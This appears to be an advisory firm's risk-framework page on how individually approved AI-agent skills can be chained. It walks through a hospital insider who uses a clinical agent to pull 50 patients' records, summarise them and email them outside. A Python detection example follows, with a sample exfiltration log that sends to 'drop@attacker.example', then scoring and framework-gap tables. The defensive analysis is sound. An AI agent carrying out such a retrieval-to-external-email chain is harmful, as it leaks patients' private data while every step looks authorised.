Skills that are safe in isolation can interact in unintended ways when composed. Each skill passes review on its own; the composition creates emergent risk that no per-skill test would detect.
Skills and plugins are tested and approved individually. A skill labeled "send email" is safe if used appropriately. A skill labeled "retrieve database records" is safe if used for authorized purposes. But when these skills are composed, new attack surfaces emerge.
Data-Retrieval + Email-Sending = potential exfiltration path. The institution tested each skill in isolation and approved both. But when an agent invokes Data-Retrieval to get sensitive data and then invokes Email-Sending to send that data to an external address, the institution has created an unintended exfiltration path. Skill composition risk is not about malicious skills. Both skills are legitimate and safe individually. The risk is that the combination of legitimate skills creates unintended capabilities that were not tested or approved.
A healthcare provider deploys a clinical support agent with several approved skills: "Patient-Record-Retrieval" (retrieve patient medical records), "Lab-Order-Creator" (create lab orders), "Email-Notifier" (send email notifications to care team), and "Report-Generator" (generate clinical reports). Each skill was individually approved by the healthcare IT team.
A bad-actor physician (insider threat) uses the clinical agent to execute the following workflow: (1) invokes Patient-Record-Retrieval to retrieve medical records for 50 random patients, (2) invokes Report-Generator to create clinical summaries for these patients, (3) invokes Email-Notifier to send summaries to external email addresses (attacker's accounts).
The physician has assembled an exfiltration pipeline from individually approved skills. Each invocation is logged and passes its own authorization check: the physician is entitled to retrieve records, to generate reports, and to send notifications. No individual check asks whether the data retrieved in step (1) is leaving the organization in step (3), so the composition produces unauthorized exfiltration while every log entry looks legitimate.
The attacker-physician sells the patient records to a healthcare data broker. When the hospital discovers the breach, it finds that the exfiltration occurred through skill composition: legitimate skills were chained in unintended ways to achieve exfiltration.
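The check the hospital lacked, as an added example that is not part of the original page: a composition-aware policy pass over one session's tool-call log. It labels the output of Patient-Record-Retrieval as PHI, propagates that label through Report-Generator to whatever consumes its output, and flags an Email-Notifier call only when labelled data goes to a recipient outside the care-team domain; it also flags bulk record retrieval. The skill names are the page's; the log shape, the `Call` dataclass, the label names, the `hospital.example` domain and the threshold of 10 patients are assumptions made for this illustration.

```python
"""Composition-aware policy check over an agent's tool-call log.

Added example, not code from the original page. Skill names follow the page's
healthcare scenario; the log shape, the taint labels, the care-team domain and
the bulk threshold are assumptions made for this illustration.
"""
from dataclasses import dataclass, field

# Labels carried by each skill's output. Assumed classification.
SOURCE_LABELS = {"Patient-Record-Retrieval": {"PHI"}}
# Skills whose output leaves the system.
EGRESS_SKILLS = {"Email-Notifier"}
# Recipient domains considered internal to the care team. Assumed.
INTERNAL_DOMAINS = {"hospital.example"}
# More patients than a clinician plausibly opens in one session. Assumed.
BULK_THRESHOLD = 10


@dataclass
class Call:
    """One logged skill invocation within a session."""
    call_id: str
    skill: str
    args: dict
    inputs: list = field(default_factory=list)  # call_ids whose output this call consumed


def taint_labels(calls):
    """Map each call_id to the labels its output carries.

    A call inherits every label attached to the outputs it consumed, so PHI
    fetched by Patient-Record-Retrieval is still PHI after Report-Generator
    has rewritten it into a summary.
    """
    labels = {}
    for c in calls:
        inherited = set().union(*(labels.get(dep, set()) for dep in c.inputs))
        labels[c.call_id] = set(SOURCE_LABELS.get(c.skill, ())) | inherited
    return labels


def external_recipients(args):
    """Recipients whose domain is not on the internal list."""
    return [r for r in args.get("to", [])
            if r.rsplit("@", 1)[-1].lower() not in INTERNAL_DOMAINS]


def evaluate_session(calls):
    """Return findings for one session.

    Each call here would pass its own per-skill authorization; the findings
    come only from looking at the chain as a whole.
    """
    findings = []
    labels = taint_labels(calls)
    for c in calls:
        ids = c.args.get("patient_ids", [])
        if c.skill == "Patient-Record-Retrieval" and len(ids) > BULK_THRESHOLD:
            findings.append(("bulk_retrieval", c.call_id, len(ids)))
        if c.skill in EGRESS_SKILLS and "PHI" in labels[c.call_id]:
            ext = external_recipients(c.args)
            if ext:
                findings.append(("phi_egress_external", c.call_id, ext))
    return findings


# Constructed log of the page's insider scenario: 50 records -> summaries -> outside address.
EXFIL_SESSION = [
    Call("c1", "Patient-Record-Retrieval", {"patient_ids": [f"P{i:03d}" for i in range(50)]}),
    Call("c2", "Report-Generator", {"format": "clinical-summary"}, inputs=["c1"]),
    Call("c3", "Email-Notifier", {"to": ["drop@attacker.example"]}, inputs=["c2"]),
]

# Constructed benign session: one patient, summary sent to the care team.
BENIGN_SESSION = [
    Call("c1", "Patient-Record-Retrieval", {"patient_ids": ["P001"]}),
    Call("c2", "Report-Generator", {"format": "clinical-summary"}, inputs=["c1"]),
    Call("c3", "Email-Notifier", {"to": ["nurse@hospital.example"]}, inputs=["c2"]),
]

if __name__ == "__main__":
    for name, session in (("exfil", EXFIL_SESSION), ("benign", BENIGN_SESSION)):
        print(name, evaluate_session(session))
```

The check depends on the agent runtime recording which earlier outputs each call consumed (the `inputs` field); without that provenance the pass degrades to a session-level heuristic such as "sensitive retrieval followed by external egress", which is still better than per-call authorization alone. Enforcing it at the egress skill's gateway, rather than in the planner, means it applies no matter how the chain was assembled.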
| Dimension | Score | Rationale |
|---|---|---|
| D - Detectability | 3 | Skill composition attacks may go undetected because each invocation is individually authorized. Detection requires correlating calls within a session, for example tracking which skill outputs feed which inputs, rather than checking each call alone. |
| A - Autonomy Sensitivity | 3 | High when agents autonomously compose skills. Less risk if humans manually invoke each skill. |
| M - Multiplicative Potential | 4 | Affects every skill composition. The number of possible chains grows combinatorially with the number of skills, so exhaustive pre-approval of compositions is impractical. |
| A - Attack Surface | 3 | Every reachable chain of skills is an attack path that per-skill review never examined. Attackers choose the chain that yields the unintended capability. |
| G - Governance Gap | 4 | Institutions approve skills individually; governance does not address composition risk. Institutions lack frameworks for skill composition vetting. |
| E - Enterprise Impact | 4 | Enables data exfiltration, abuse of approved capabilities, and insider threat exploitation. |
| Composite DAMAGE Score | 3.8 | High. Requires dedicated controls and monitoring. Should not be accepted without mitigation. |
How severity changes across the agent architecture spectrum.
| Agent Type | Impact | How This Risk Manifests |
|---|---|---|
| Digital Assistant | Low | Human manually invokes skills one at a time with explicit intent. Composition risk is low. |
| Digital Apprentice | Low-Med | Agents compose skills but with human oversight. Unusual compositions are flagged. |
| Autonomous Agent | High | Agents autonomously compose skills to achieve goals. Composition patterns may not have been tested. |
| Delegating Agent | High | Primary function is to invoke skills in sequence. Composition of tools creates attack surface. |
| Agent Crew / Pipeline | Med-High | Crew agents compose skills across crew. Interactions between agents' skill invocations create composition risk. |
| Agent Mesh / Swarm | Very High | Mesh agents dynamically compose skills from global pool. Composition patterns are unpredictable and untested. |
| Framework | Coverage | Citation | What It Addresses | What It Misses |
|---|---|---|---|---|
| NIST AI RMF 1.0 | Minimal | MAP 5.1 (Component Interactions) | System performance and component interactions. | Skill composition risk and unintended capability emergence. |
| OWASP Agentic Top 10 | Not Directly | None specific | Agentic security broadly. | Skill composition attacks. |
| GDPR Article 32 | Partial | Art. 32, Security of processing | Integrity and confidentiality safeguards. | Skill composition exfiltration paths. |
| HIPAA Security Rule | Partial | 45 CFR Part 164, Subpart C | Administrative, physical, and technical safeguards for PHI. | Skill composition exploitation. |
In healthcare, data protection regulations (HIPAA) require safeguards against unauthorized access and exfiltration. Skill composition attacks can bypass traditional safeguards because each individual skill invocation is authorized. The composition creates the vulnerability.
In finance, skill composition risk enables insider threat exploitation. An employee authorized to retrieve customer records and send emails could use skill composition to exfiltrate customer data.
Skill Composition and Interaction Risk requires architectural controls that go beyond what existing frameworks provide. Our advisory engagements are purpose-built for banks, insurers, and financial institutions subject to prudential oversight.